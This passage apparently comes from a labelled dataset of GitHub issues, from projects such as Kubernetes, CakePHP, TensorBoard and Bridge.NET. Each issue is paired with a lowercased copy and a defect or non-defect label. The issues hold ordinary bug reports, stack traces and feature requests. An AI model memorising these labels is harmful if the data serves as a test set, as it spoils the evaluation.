at Microsoft.Runtime.CompilerServices.TaskAwaiter.ThrowForNonSuccess(Task task)
at Microsoft.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccess(Task task)
at Microsoft.Runtime.CompilerServices.ConfiguredTaskAwaitable`1.ConfiguredTaskAwaiter.GetResult()
at Google.Apis.Upload.ResumableUpload`1.<UploadCoreAsync>d__e.MoveNext() in
What version of the product are you using?
1.8.1
What is your operating system?
Windows 7
What is your IDE?
VS 2010
What is the .NET framework version?
4
Please provide any additional information below.
Youtube is making me angry by requiring a google plus account.
```
Original issue reported on code.google.com by `TERMINAT...@ogilvy.com` on 8 Apr 2014 at 4:55
|
defect
|
youtubeservice videos insert hides exceptions what steps will reproduce the problem call youtubeservice videos insert expecting an http check the result of the insert call s iuploadprogress exception property expected result a reference to an exception related to and with a message pertaining to the http error actual result system argumentnullexception value cannot be null parameter name baseuri at microsoft runtime compilerservices taskawaiter throwfornonsuccess task task at microsoft runtime compilerservices taskawaiter handlenonsuccess task task at microsoft runtime compilerservices configuredtaskawaitable configuredtaskawaiter getresult at google apis upload resumableupload d e movenext in what version of the product are you using what is your operating system windows what is your ide vs what is the net framework version please provide any additional information below youtube is making me angry by requiring a google plus account original issue reported on code google com by terminat ogilvy com on apr at
| 1
|
290,727
| 21,897,417,492
|
IssuesEvent
|
2022-05-20 09:58:37
|
bounswe/bounswe2022group1
|
https://api.github.com/repos/bounswe/bounswe2022group1
|
closed
|
Weekly meeting notes #9
|
Type: Documentation
|
I should upload the meeting notes of the meeting on 19.05.2022 for the Milestone report 2
|
1.0
|
Weekly meeting notes #9 - I should upload the meeting notes of the meeting on 19.05.2022 for the Milestone report 2
|
non_defect
|
weekly meeting notes i should upload the meeting notes of the meeting on for the milestone report
| 0
|
53,616
| 13,261,977,760
|
IssuesEvent
|
2020-08-20 20:52:55
|
icecube-trac/tix4
|
https://api.github.com/repos/icecube-trac/tix4
|
closed
|
Software documentation links almost all lead to 403 - Forbidden (Trac #1758)
|
Migrated from Trac defect other
|
http://software.icecube.wisc.edu/documentation
Almost all links I've tried from "Project Details" heading and below go to
403 - Forbidden
clsim and children work, though, as well as links above "Project Details." I suspect this is because I visited these pages and my web browser cached them; trying from a browser from a server, all documentation links (including the documentation link itself) return 403 errors.
<details>
<summary><em>Migrated from <a href="https://code.icecube.wisc.edu/projects/icecube/ticket/1758">https://code.icecube.wisc.edu/projects/icecube/ticket/1758</a>, reported by jlanfranchi</summary>
<p>
```json
{
"status": "closed",
"changetime": "2016-06-23T07:37:44",
"_ts": "1466667464194375",
"description": "http://software.icecube.wisc.edu/documentation\n\nAlmost all links I've tried from \"Project Details\" heading and below go to\n403 - Forbidden\nclsim and children work, though, as well as links above \"Project Details.\" I suspect this is because I visited these pages and my web browser cached them; trying from a browser from a server, all documentation links (including the documentation link itself) return 403 errors.",
"reporter": "jlanfranchi",
"cc": "",
"resolution": "invalid",
"time": "2016-06-23T04:42:28",
"component": "other",
"summary": "Software documentation links almost all lead to 403 - Forbidden",
"priority": "normal",
"keywords": "",
"milestone": "",
"owner": "",
"type": "defect"
}
```
</p>
</details>
|
1.0
|
Software documentation links almost all lead to 403 - Forbidden (Trac #1758) - http://software.icecube.wisc.edu/documentation
Almost all links I've tried from "Project Details" heading and below go to
403 - Forbidden
clsim and children work, though, as well as links above "Project Details." I suspect this is because I visited these pages and my web browser cached them; trying from a browser from a server, all documentation links (including the documentation link itself) return 403 errors.
<details>
<summary><em>Migrated from <a href="https://code.icecube.wisc.edu/projects/icecube/ticket/1758">https://code.icecube.wisc.edu/projects/icecube/ticket/1758</a>, reported by jlanfranchi</summary>
<p>
```json
{
"status": "closed",
"changetime": "2016-06-23T07:37:44",
"_ts": "1466667464194375",
"description": "http://software.icecube.wisc.edu/documentation\n\nAlmost all links I've tried from \"Project Details\" heading and below go to\n403 - Forbidden\nclsim and children work, though, as well as links above \"Project Details.\" I suspect this is because I visited these pages and my web browser cached them; trying from a browser from a server, all documentation links (including the documentation link itself) return 403 errors.",
"reporter": "jlanfranchi",
"cc": "",
"resolution": "invalid",
"time": "2016-06-23T04:42:28",
"component": "other",
"summary": "Software documentation links almost all lead to 403 - Forbidden",
"priority": "normal",
"keywords": "",
"milestone": "",
"owner": "",
"type": "defect"
}
```
</p>
</details>
|
defect
|
software documentation links almost all lead to forbidden trac almost all links i ve tried from project details heading and below go to forbidden clsim and children work though as well as links above project details i suspect this is because i visited these pages and my web browser cached them trying from a browser from a server all documentation links including the documentation link itself return errors migrated from json status closed changetime ts description all links i ve tried from project details heading and below go to forbidden nclsim and children work though as well as links above project details i suspect this is because i visited these pages and my web browser cached them trying from a browser from a server all documentation links including the documentation link itself return errors reporter jlanfranchi cc resolution invalid time component other summary software documentation links almost all lead to forbidden priority normal keywords milestone owner type defect
| 1
|
7,857
| 2,611,053,511
|
IssuesEvent
|
2015-02-27 00:24:40
|
alistairreilly/andors-trail
|
https://api.github.com/repos/alistairreilly/andors-trail
|
opened
|
Combat is uninteresting
|
auto-migrated Priority-Medium Type-Defect
|
```
Some of the changes in 0.6.7a have highlighted this issue for me. Basically, you
look at your health, either heal or attack, then repeat. There is very little
to it beyond that.
I understand some of the comments here may be because we only have the start of
the game and so a basic selection of enemies, items and quests, but I would
rather make them unnecessarily than not.
I've noticed this particularly with the recent changes. I have everything set
to the fastest options, no confirm attack, auto pickup loot, instant combat
speed. Combine this with using the trackball to move and I barely even notice
when an enemy gets in my way. Once in combat, any trackball direction counts as
a screen tap and causes an attack, allowing me to get through my attacks in
very fast, and the enemies are instant. All I have to do is keep half an eye on
my HP and heal when necessary.
This is even the case on a new game, I started one last night and once I had a
decent sword and a couple of levels (a few minutes work) it got a lot easier.
So I could just change the settings to slow everything down you say?
I could, but the underlying problem is still there. Combat doesn't require
attention and isn't challenging or varied. Having it so sped up just highlights
the issue, it doesn't cause it.
So what can be done about this?
I can think of a few possibilities. Specifically changing the combat UI to give
more focus and control to the combat, adding more variety and tactics to combat
(skills and spells as discussed elsewhere) and more variety to the enemies.
When it comes to the UI, I can think of two areas of change that would improve
things. Firstly, and not specifically related to combat, don't have any buttons
at the top of the screen. When I play I hold the device in my palm and interact
with my thumb. I can't easily reach the top of the screen without moving my
whole arm and when I do I cover the screen with my hand. I can't be the only
one who plays this way. I would suggest having the players health and xp (and
other pertinent information, mana, stamina, e.t.c.) in thin bars at the top of
the screen at all times, and keep buttons at the bottom of the screen. Maybe a
row for accessing the character screen, inventory, journal (spells, quests,
map) e.t.c. and a second row of context-specific buttons that change for
combat, wandering and any other activities that are added.
The second thing I think would improve UI is zooming in to a 5x5 area (enough
to see where to go if you need to run) around the player when they enter
combat. This would allow for more detail to be displayed in the game area
itself. Small health bars by each enemy in a group fight, with a detail section
for the selected enemy showing the specific numbers, the tiny (on my phone) red
numbers showing damage on each hit could be enlarged, and making the game area
square would give a bit more room for skill, spell and item quick access when
they are added.
Skills and spells are elsewhere, and I won't go into detail here, but I will
say that they should do more than just beef up the player. They should add
different strategies to the game, debilitation and disabling enemies
(immobilising, reducing enemy skills, slowing, making them take more ap to
attack e.t.c.), evasion/dodge (careful, almost always overpowered if skilled
exclusively), tanking (soaking up damage), berserk (damage bonus rises as hp
drops), combos, vampirism e.t.c.
Enemies need more variety, they should use different tactics, much like the
various options for the player mentioned above.
Groups of enemies that work together to provide different parts of a combo
would be excellent, requiring the player to separate them out and kill them one
by one or risk a dangerous combo (one enemy binds a player, the next delivers a
special attack that auto crits on an immobilised target, for example). This
should be dependent on a good way to let the player know what is going on,
as getting killed when you don't know what is happening is no fun.
```
Original issue reported on code.google.com by `caveman....@gmail.com` on 11 Dec 2010 at 8:04
|
1.0
|
Combat is uninteresting - ```
Some of the changes in 0.6.7a have highlighted this issue for me. Basically, you
look at your health, either heal or attack, then repeat. There is very little
to it beyond that.
I understand some of the comments here may be because we only have the start of
the game and so a basic selection of enemies, items and quests, but I would
rather make them unnecessarily than not.
I've noticed this particularly with the recent changes. I have everything set
to the fastest options, no confirm attack, auto pickup loot, instant combat
speed. Combine this with using the trackball to move and I barely even notice
when an enemy gets in my way. Once in combat, any trackball direction counts as
a screen tap and causes an attack, allowing me to get through my attacks in
very fast, and the enemies are instant. All I have to do is keep half an eye on
my HP and heal when necessary.
This is even the case on a new game, I started one last night and once I had a
decent sword and a couple of levels (a few minutes work) it got a lot easier.
So I could just change the settings to slow everything down you say?
I could, but the underlying problem is still there. Combat doesn't require
attention and isn't challenging or varied. Having it so sped up just highlights
the issue, it doesn't cause it.
So what can be done about this?
I can think of a few possibilities. Specifically changing the combat UI to give
more focus and control to the combat, adding more variety and tactics to combat
(skills and spells as discussed elsewhere) and more variety to the enemies.
When it comes to the UI, I can think of two areas of change that would improve
things. Firstly, and not specifically related to combat, don't have any buttons
at the top of the screen. When I play I hold the device in my palm and interact
with my thumb. I can't easily reach the top of the screen without moving my
whole arm and when I do I cover the screen with my hand. I can't be the only
one who plays this way. I would suggest having the players health and xp (and
other pertinent information, mana, stamina, e.t.c.) in thin bars at the top of
the screen at all times, and keep buttons at the bottom of the screen. Maybe a
row for accessing the character screen, inventory, journal (spells, quests,
map) e.t.c. and a second row of context-specific buttons that change for
combat, wandering and any other activities that are added.
The second thing I think would improve UI is zooming in to a 5x5 area (enough
to see where to go if you need to run) around the player when they enter
combat. This would allow for more detail to be displayed in the game area
itself. Small health bars by each enemy in a group fight, with a detail section
for the selected enemy showing the specific numbers, the tiny (on my phone) red
numbers showing damage on each hit could be enlarged, and making the game area
square would give a bit more room for skill, spell and item quick access when
they are added.
Skills and spells are elsewhere, and I won't go into detail here, but I will
say that they should do more than just beef up the player. They should add
different strategies to the game, debilitation and disabling enemies
(immobilising, reducing enemy skills, slowing, making them take more ap to
attack e.t.c.), evasion/dodge (careful, almost always overpowered if skilled
exclusively), tanking (soaking up damage), berserk (damage bonus rises as hp
drops), combos, vampirism e.t.c.
Enemies need more variety, they should use different tactics, much like the
various options for the player mentioned above.
Groups of enemies that work together to provide different parts of a combo
would be excellent, requiring the player to separate them out and kill them one
by one or risk a dangerous combo (one enemy binds a player, the next delivers a
special attack that auto crits on an immobilised target, for example). This
should be dependent on a good way to let the player know what is going on,
as getting killed when you don't know what is happening is no fun.
```
Original issue reported on code.google.com by `caveman....@gmail.com` on 11 Dec 2010 at 8:04
|
defect
|
combat is uninteresting some of the changes in have highlighted this issue for me basicly you look at your health either heal or attack then repeat there is very little to it beyond that i understand some of the comments here may be because we only have the start of the game and so a basic selection of enemies items and quests but i would make them unnecessarily than not i ve noticed this particularly with the recent changes i have everything set to the fastest options no confirm attack auto pickup loot instant combat speed combine this with using the trackball to move and i barely even notice when an enemy gets in my way once in combat any trackball direction counts as a screen tap and causes an attack allowing me to get through my attacks in very fast and the enemies are instant all i have to do is keep half an eye on my hp and heal when necessary this is even the case on a new game i started one last night and once i had a decent sword and a couple of levels a few minutes work it got a lot easier so i could just change the settings to slow everything down you say i could but the underlying problem is still there combat doesn t require attention and isn t challenging or varied having it so sped up just highlights the issue it doesn t cause it so what can be done about this i can think of a few possibilities specifically changing the combat ui to give more focus and control to the combat adding more variety and tactics to combat skills and spells as discussed elsewhere and more variety to the enemies when it comes to the ui i can think of two areas of change that would improve things firstly and not specifically related to combat don t have any buttons at the top of the screen when i play i hold the device in my palm and interact with my thumb i can t easily reach the top of the screen without moving my whole arm and when i do i cover the screen with my hand i can t be the only one who plays this way i would suggest having the players health and xp and other 
pertinent information mana stamina e t c in thin bars at the top of the screen at all times and keep buttons at the bottom of the screen maybe a row for accessing the character screen inventory journal spells quests map e t c and a second row of context specific buttons that change for combat wandering and any other activities that are added the second thing i think would improve ui is zooming in to a area enough to see where to go if you need to run around the player when they enter combat this would allow for more detail to be displayed in the game area itself small health bars by each enemy in a group fight with a detail section for the selected enemy showing the specific numbers the tiny on my phone red numbers showing damage on each hit could be enlarged and making the game area square would give a bit more room for skill spell and item quick access when they are added skills and spells are elsewhere and i won t go into detail here but i will say that they should do more than just beef up the player they should add different strategies to the game debilitation and disabling enemies immobilising reducing enemy skills slowing making them take more ap to attack e t c evasion dodge careful almost always overpowered if skilled exclusively tanking soaking up damage berserk damage bonus rises as hp drops combos vampirism e t c enemies need more variety they should use different tactics much like the various options for the player mentioned above groups of enemies that work together to provide different parts of a combo would be excellent requiring the player to seperate them out and kill them one by one or risk a dangerous combo one enemy binds a player the next delivers a special attack that auto crits on an immobilised target for example this should be dependant on a good way to tell the player knowing what is going on as getting killed when you don t know what is happening is no fun original issue reported on code google com by caveman gmail com on dec at
| 1
|
255,440
| 19,302,490,558
|
IssuesEvent
|
2021-12-13 07:56:24
|
Ootzk/SsENet.PyTorch
|
https://api.github.com/repos/Ootzk/SsENet.PyTorch
|
closed
|
Reorganize Project
|
documentation organization
|
too many redundant codes (especially model structure)
change 1 model structure code and choose squeeze algorithm with argument.
|
1.0
|
Reorganize Project - too many redundant codes (especially model structure)
change 1 model structure code and choose squeeze algorithm with argument.
|
non_defect
|
reorganize project too many redundant codes especially model structure change model structure code and choose squeeze algorithm with argument
| 0
|
10,543
| 7,220,098,645
|
IssuesEvent
|
2018-02-09 00:06:31
|
tensorflow/tensorboard
|
https://api.github.com/repos/tensorflow/tensorboard
|
closed
|
[win7-64bit,Anaconda,tensorflow 1.2.0,chrome]Tensorboard : No scalar data was found
|
(╯°□°)╯windows type:bug/performance type:support
|
I can't see any data. It turned out to be: No scalar data
was found
when I run the tensorboard ,there is no error or warning
Environment info
Windows 7 64-bit
Anaconda Python 3.5
Tensoflow installed from binary pip package
tensorflow version:1.2.0
Browser: Chrome 58
About the code
I just ran the example code mnist_with_summaries.py
it is in D:\Anaconda\Lib\site-packages\tensorflow\examples\tutorials\mnist\mnist_with_summaries.py
What have you tried?
I can see a log file called events.out.tfevents.* in the folder I set. The file is about 16Mb big.
I call tensorboard --logdir=/tmp/tensorflow/mnist/logs/mnist_with_summaries --debug and I can verify the log dir is correct.
On the browser I can't see any data or graph is shown.
If I call tensorboard --inspect --logdir=/tmp/tensorflow/mnist/logs/mnist_with_summaries It shows how the tfevent file contains.
|
True
|
[win7-64bit,Anaconda,tensorflow 1.2.0,chrome]Tensorboard : No scalar data was found - I can't see any data. It turned out to be: No scalar data
was found
when I run the tensorboard ,there is no error or warning
Environment info
Windows 7 64-bit
Anaconda Python 3.5
Tensoflow installed from binary pip package
tensorflow version:1.2.0
Browser: Chrome 58
About the code
I just ran the example code mnist_with_summaries.py
it is in D:\Anaconda\Lib\site-packages\tensorflow\examples\tutorials\mnist\mnist_with_summaries.py
What have you tried?
I can see a log file called events.out.tfevents.* in the folder I set. The file is about 16Mb big.
I call tensorboard --logdir=/tmp/tensorflow/mnist/logs/mnist_with_summaries --debug and I can verify the log dir is correct.
On the browser I can't see any data or graph is shown.
If I call tensorboard --inspect --logdir=/tmp/tensorflow/mnist/logs/mnist_with_summaries It shows how the tfevent file contains.
|
non_defect
|
tensorboard no scalar data was found i can t see any data it turned out to be no scalar was found when i run the tensorboard there is no error or warning environment info windows bit anaconda python tensoflow installed from binary pip package tensorflow version browser chrome about the code i just run the example code mnist with summries py it is in d anaconda lib site packages tensorflow examples tutorials mnist mnist with summaries py what have you tried i can see a log file called events out tfevents in the folder i set the file is about big i call tensorboard logdir tmp tensorflow mnist logs mnist with summaries debug and i can verify the log dir is correct on the browser i can t see any data or graph is shown if i call tensorboard inspect logdir tmp tensorflow mnist logs mnist with summaries it shows how the tfevent file contains
| 0
|
414,680
| 27,998,887,830
|
IssuesEvent
|
2023-03-27 10:19:23
|
Joystream/joystream
|
https://api.github.com/repos/Joystream/joystream
|
opened
|
Ephesus: Missing CHANGELOG entries
|
documentation ephesus
|
I noticed we still have a few missing `CHANGELOG` on Ephesus branch:
- Argus: `1.1.0` (there is actually a related issue: https://github.com/Joystream/joystream/issues/4545)
- Colossus: `3.2.0`
- Query node: `1.2.0`
- Types: `2.0.0`, `2.1.0`
|
1.0
|
Ephesus: Missing CHANGELOG entries - I noticed we still have a few missing `CHANGELOG` on Ephesus branch:
- Argus: `1.1.0` (there is actually a related issue: https://github.com/Joystream/joystream/issues/4545)
- Colossus: `3.2.0`
- Query node: `1.2.0`
- Types: `2.0.0`, `2.1.0`
|
non_defect
|
ephesus missing changelog entries i noticed we still have a few missing changelog on ephesus branch argus there is actually a related issue colossus query node types
| 0
|
30,081
| 6,016,552,060
|
IssuesEvent
|
2017-06-07 07:19:09
|
bridgedotnet/Bridge
|
https://api.github.com/repos/bridgedotnet/Bridge
|
closed
|
External classes marked with [Namespace] and [IgnoreGeneric]
|
defect in progress
|
When a class is marked with the `[External]`, `[IgnoreGeneric]` and `[Namespace]` attributes, there should not be any adjustments to the class name.
This is a particular case of the issue #2349. Basically it was supposed that even if a custom namespace specified, the original class name will be used without arity value.
### Steps To Reproduce
https://dev.deck.net/1c7bd8456c559917900f410cdcb925da/vert
```c#
public class Program
{
public static void Main()
{
var test = new Generic<int>();
}
}
[External]
[IgnoreGeneric]
[Namespace(false)] // <-- Comment it to fix
public class Generic<T>
{
}
```
### Expected Result
```js
Bridge.assembly("Demo", function ($asm, globals) {
"use strict";
Bridge.define("Demo.Program", {
main: function Main() {
var test = new Generic();
}
});
});
```
### Actual Result
```js
Bridge.assembly("Demo", function ($asm, globals) {
"use strict";
Bridge.define("Demo.Program", {
main: function Main() {
var test = new Generic$1();
}
});
});
```
## See Also
- [#2349] Naming of external classes marked with [IgnoreGeneric]
|
1.0
|
External classes marked with [Namespace] and [IgnoreGeneric] - When a class is marked with the `[External]`, `[IgnoreGeneric]` and `[Namespace]` attributes, there should not be any adjustments to the class name.
This is a particular case of the issue #2349. Basically it was supposed that even if a custom namespace specified, the original class name will be used without arity value.
### Steps To Reproduce
https://dev.deck.net/1c7bd8456c559917900f410cdcb925da/vert
```c#
public class Program
{
public static void Main()
{
var test = new Generic<int>();
}
}
[External]
[IgnoreGeneric]
[Namespace(false)] // <-- Comment it to fix
public class Generic<T>
{
}
```
### Expected Result
```js
Bridge.assembly("Demo", function ($asm, globals) {
"use strict";
Bridge.define("Demo.Program", {
main: function Main() {
var test = new Generic();
}
});
});
```
### Actual Result
```js
Bridge.assembly("Demo", function ($asm, globals) {
"use strict";
Bridge.define("Demo.Program", {
main: function Main() {
var test = new Generic$1();
}
});
});
```
## See Also
- [#2349] Naming of external classes marked with [IgnoreGeneric]
|
defect
|
external classes marked with and when a class marked with and attributes there should not be any adjustments to the class name this is a particular case of the issue basically it was supposed that even if a custom namespace specified the original class name will be used without arity value steps to reproduce c public class program public static void main var test new generic comment it to fix public class generic expected result js bridge assembly demo function asm globals use strict bridge define demo program main function main var test new generic actual result js bridge assembly demo function asm globals use strict bridge define demo program main function main var test new generic see also naming of external classes marked with
| 1
|
774,130
| 27,184,358,426
|
IssuesEvent
|
2023-02-19 02:12:35
|
Reyder95/Project-Vultura-3D-Unity
|
https://api.github.com/repos/Reyder95/Project-Vultura-3D-Unity
|
closed
|
Refreshing list causes flicker and mouse events to stop working if held
|
bug high priority in development
|
For the 2nd part, I may look into finding a way to have event happen on mouse down, rather than on mouse up.
For flicker, that may be a deeper, unfixable problem.
|
1.0
|
Refreshing list causes flicker and mouse events to stop working if held - For the 2nd part, I may look into finding a way to have event happen on mouse down, rather than on mouse up.
For flicker, that may be a deeper, unfixable problem.
|
non_defect
|
refreshing list causes flicker and mouse events to stop working if held for the part i may look into finding a way to have event happen on mouse down rather than on mouse up for flicker that may be a deeper unfixable problem
| 0
|
458,408
| 13,174,835,146
|
IssuesEvent
|
2020-08-11 23:38:36
|
phetsims/ratio-and-proportion
|
https://api.github.com/repos/phetsims/ratio-and-proportion
|
closed
|
Make white hand circle transparent
|
priority:2-high
|
We would like the white circle in the hand to be transparent. Right now, we are placing a white circle on top of the hand icon.
Current look:

`ai` file: https://github.com/phetsims/ratio-and-proportion/blob/13d8ee98ae71bc575bc47766f40cb58924a0f358/assets/filled-in-hand.ai
current png: https://github.com/phetsims/ratio-and-proportion/blob/13d8ee98ae71bc575bc47766f40cb58924a0f358/images/filled-in-hand.png
Here is the actual rasterized Node from the sim with the white circle on it:

In the code the white circle has a radius of 10 pixels, and its positioning on top of the current png icon looks like:
```js
// empirical multipliers to center hand on palm. Don't change these without altering the layout for the cue arrows too.
handImage.right = handImage.width * .4;
handImage.bottom = handImage.height * .475;
```
And the hand png is scaled down by `.4`.
@arouinfar, would it be easy to provide an `ai` and `png` with an added transparent circle replacing the white circle here?
I'm happy to talk more about this if you have any questions.
|
1.0
|
Make white hand circle transparent - We would like the white circle in the hand to be transparent. Right now, we are placing a white circle on top of the hand icon.
Current look:

`ai` file: https://github.com/phetsims/ratio-and-proportion/blob/13d8ee98ae71bc575bc47766f40cb58924a0f358/assets/filled-in-hand.ai
current png: https://github.com/phetsims/ratio-and-proportion/blob/13d8ee98ae71bc575bc47766f40cb58924a0f358/images/filled-in-hand.png
Here is the actual rasterized Node from the sim with the white circle on it:

In the code the white circle has a radius of 10 pixels, and its positioning on top of the current png icon looks like:
```js
// empirical multipliers to center hand on palm. Don't change these without altering the layout for the cue arrows too.
handImage.right = handImage.width * .4;
handImage.bottom = handImage.height * .475;
```
And the hand png is scaled down by `.4`.
@arouinfar, would it be easy to provide an `ai` and `png` with an added transparent circle replacing the white circle here?
I'm happy to talk more about this if you have any questions.
|
non_defect
|
make white hand circle transparent we would like the white circle in the hand to be transparent right now we are placing a white circle on top of the hand icon current look ai file current png here is the actual rasterized node from the sim with the white circle on it in the code the white circle has a radius of pixels and its positioning on top of the current png icon looks like js empirical multipliers to center hand on palm don t change these without altering the layout for the cue arrows too handimage right handimage width handimage bottom handimage height and the hand png is scaled down by arouinfar would it be easy to provide an ai and png with an added transparent circle replacing the white circle here i m happy to talk more about this if you have any questions
| 0
|
50,022
| 13,187,309,095
|
IssuesEvent
|
2020-08-13 03:00:18
|
icecube-trac/tix3
|
https://api.github.com/repos/icecube-trac/tix3
|
closed
|
mutineer. clean up. (Trac #16)
|
Migrated from Trac defect offline-software
|
<details>
<summary>_Migrated from https://code.icecube.wisc.edu/ticket/16
, reported by troy and owned by _</summary>
<p>
```json
{
"status": "closed",
"changetime": "2007-11-11T03:51:18",
"description": "\n",
"reporter": "troy",
"cc": "",
"resolution": "fixed",
"_ts": "1194753078000000",
"component": "offline-software",
"summary": "mutineer. clean up.",
"priority": "normal",
"keywords": "",
"time": "2007-06-03T16:33:37",
"milestone": "",
"owner": "",
"type": "defect"
}
```
</p>
</details>
|
1.0
|
mutineer. clean up. (Trac #16) -
<details>
<summary>_Migrated from https://code.icecube.wisc.edu/ticket/16
, reported by troy and owned by _</summary>
<p>
```json
{
"status": "closed",
"changetime": "2007-11-11T03:51:18",
"description": "\n",
"reporter": "troy",
"cc": "",
"resolution": "fixed",
"_ts": "1194753078000000",
"component": "offline-software",
"summary": "mutineer. clean up.",
"priority": "normal",
"keywords": "",
"time": "2007-06-03T16:33:37",
"milestone": "",
"owner": "",
"type": "defect"
}
```
</p>
</details>
|
defect
|
mutineer clean up trac migrated from reported by troy and owned by json status closed changetime description n reporter troy cc resolution fixed ts component offline software summary mutineer clean up priority normal keywords time milestone owner type defect
| 1
|
23,162
| 3,773,601,118
|
IssuesEvent
|
2016-03-17 03:28:00
|
cakephp/cakephp
|
https://api.github.com/repos/cakephp/cakephp
|
closed
|
Problems to write in Session after upgrade cakephp from 2.7.9 to 2.8.0
|
Defect On hold
|
Hello, I'm facing a problem writing to the Session. My project is set to save all sessions in the database, via the lines below:
```
Configure::write('Session', [
'defaults' => 'database'
]);
```
I ran sessions.php from the Schema folder. I'm not using customized classes for holding sessions.
I was using version 2.7.9 before upgrading to 2.8.0.
The error being shown is:
Warning (2): Unknown: Failed to write session data (user). Please verify that the current setting of session.save_path is correct (/tmp/) [Unknown, line 0]
I have changed my configuration to have CakePHP hold the sessions.
Could you please help me?
Thank you in advance
|
1.0
|
Problems to write in Session after upgrade cakephp from 2.7.9 to 2.8.0 - Hello, I'm facing a problem writing to the Session. My project is set to save all sessions in the database, via the lines below:
```
Configure::write('Session', [
'defaults' => 'database'
]);
```
I ran sessions.php from the Schema folder. I'm not using customized classes for holding sessions.
I was using version 2.7.9 before upgrading to 2.8.0.
The error being shown is:
Warning (2): Unknown: Failed to write session data (user). Please verify that the current setting of session.save_path is correct (/tmp/) [Unknown, line 0]
I have changed my configuration to have CakePHP hold the sessions.
Could you please help me?
Thank you in advance
|
defect
|
problems to write in session after upgrade cakephp from to hello i m facing a problem to write stuff in session my project is set to save all session in database through the lines below configure write session defaults database it was ran sessions php in schema folder i m not using customized classes for holding sessions i was using version before upgrade it to the erros has being shown warning unknown failed to write session data user please verify that the current setting of session save path is correct tmp i have had changed my configuration to cakephp hold the sessions could you please help me thank you in advance
| 1
|
282,378
| 8,706,037,423
|
IssuesEvent
|
2018-12-06 00:52:56
|
kubernetes/kubernetes
|
https://api.github.com/repos/kubernetes/kubernetes
|
closed
|
Incorrect start times can cause heapster to not have CPU stats
|
kind/bug priority/important-soon sig/node
|
/kind bug
/sig node
/priority important-soon
When HPA is supposed to upscale it is intermittently unable to calculate the number of desired replicas because of missing metrics
`$ kubectl describe hpa <hpa-name>`
` 3d 29s 80 horizontal-pod-autoscaler Warning FailedGetResourceMetric unable to get metrics for resource cpu: no metrics returned from heapster`
` 3d 29s 80 horizontal-pod-autoscaler Warning FailedComputeMetricsReplicas failed to get cpu utilization: unable to get metrics for resource cpu: no metrics returned from heapster`
The kubelet was returning an invalid Start time for pods, containers, and the node:
`"podRef": {`
` "uid": "7efbdb50-0830-11e8-9e01-42010af0001e"`
`},`
`"startTime": "2018-02-07T09:53:05Z",`
`"containers": [`
`{`
` "startTime": "2018-02-07T09:53:05Z",`
` "cpu": {`
` "time": "2018-02-07T09:53:03Z",`
` },`
` "memory": {`
` "time": "2018-02-07T09:53:03Z",`
` },`
` "rootfs": {`
`"time": "2018-02-07T09:53:03Z",`
`},`
`"logs": {`
` "time": "2018-02-07T09:53:03Z",`
`},`
`},`
Here is the Heapster code that computes cpu usage rate (this is the metric for HPA): https://github.com/kubernetes/heapster/blob/release-1.4/metrics/processors/rate_calculator.go, which requires that the current and previous batch have the same start time. A start time which changes often results in very few cpu metrics for heapster.
When cadvisor calculates the start time, it looks at the last time `cgroup.clone_children` was modified. https://github.com/google/cadvisor/blob/master/container/common/helpers.go#L56
This is an estimate, at best. We recently changed cAdvisor to use docker's container creation time: https://github.com/google/cadvisor/pull/1806.
But we still need to get a real Pod, Node and system container Start time.
|
1.0
|
Incorrect start times can cause heapster to not have CPU stats - /kind bug
/sig node
/priority important-soon
When HPA is supposed to upscale it is intermittently unable to calculate the number of desired replicas because of missing metrics
`$ kubectl describe hpa <hpa-name>`
` 3d 29s 80 horizontal-pod-autoscaler Warning FailedGetResourceMetric unable to get metrics for resource cpu: no metrics returned from heapster`
` 3d 29s 80 horizontal-pod-autoscaler Warning FailedComputeMetricsReplicas failed to get cpu utilization: unable to get metrics for resource cpu: no metrics returned from heapster`
The kubelet was returning an invalid Start time for pods, containers, and the node:
`"podRef": {`
` "uid": "7efbdb50-0830-11e8-9e01-42010af0001e"`
`},`
`"startTime": "2018-02-07T09:53:05Z",`
`"containers": [`
`{`
` "startTime": "2018-02-07T09:53:05Z",`
` "cpu": {`
` "time": "2018-02-07T09:53:03Z",`
` },`
` "memory": {`
` "time": "2018-02-07T09:53:03Z",`
` },`
` "rootfs": {`
`"time": "2018-02-07T09:53:03Z",`
`},`
`"logs": {`
` "time": "2018-02-07T09:53:03Z",`
`},`
`},`
Here is the Heapster code that computes cpu usage rate (this is the metric for HPA): https://github.com/kubernetes/heapster/blob/release-1.4/metrics/processors/rate_calculator.go, which requires that the current and previous batch have the same start time. A start time which changes often results in very few cpu metrics for heapster.
When cadvisor calculates the start time, it looks at the last time `cgroup.clone_children` was modified. https://github.com/google/cadvisor/blob/master/container/common/helpers.go#L56
This is an estimate, at best. We recently changed cAdvisor to use docker's container creation time: https://github.com/google/cadvisor/pull/1806.
But we still need to get a real Pod, Node and system container Start time.
|
non_defect
|
incorrect start times can cause heapster to not have cpu stats kind bug sig node priority important soon when hpa is supposed to upscale it is intermittently unable to calculate the number of desired replicas because of missing metrics kubectl describe hpa horizontal pod autoscaler warning failedgetresourcemetric unable to get metrics for resource cpu no metrics returned from heapster horizontal pod autoscaler warning failedcomputemetricsreplicas failed to get cpu utilization unable to get metrics for resource cpu no metrics returned from heapster the kubelet was returning an invalid start time for pods containers and the node podref uid starttime containers starttime cpu time memory time rootfs time logs time here is the heapster code that computes cpu usage rate this is the metric for hpa which requires that the current and previous batch have the same start time a start time which changes often results in very few cpu metrics for heapster when cadvisor calculates the start time it looks at the last time cgroup clone children was modified this is an estimate at best we recently changed cadvisor to use docker s container creation time but we still need to get a real pod node and system container start time
| 0
|
35,585
| 17,140,578,731
|
IssuesEvent
|
2021-07-13 09:09:46
|
Yoast/wordpress-seo
|
https://api.github.com/repos/Yoast/wordpress-seo
|
closed
|
fill_cache creates high server load
|
Yoast: Management component: indexables component: performance severity: minor
|
<!-- Please use this template when creating an issue.
- Please check the boxes after you've created your issue.
- Please use the latest version of Yoast SEO.-->
* [x] I've read and understood the [contribution guidelines](https://github.com/Yoast/wordpress-seo/blob/trunk/.github/CONTRIBUTING.md).
* [x] I've searched for any related issues and avoided creating a duplicate issue.
### Please give us a description of what happened.
After upgrade from Yoast SEO from 13.5 to 16.0.2 experiencing high server load.
### Please describe what you expected to happen and why.
The reason is very slow SQL query being executed on every ajax request:
```
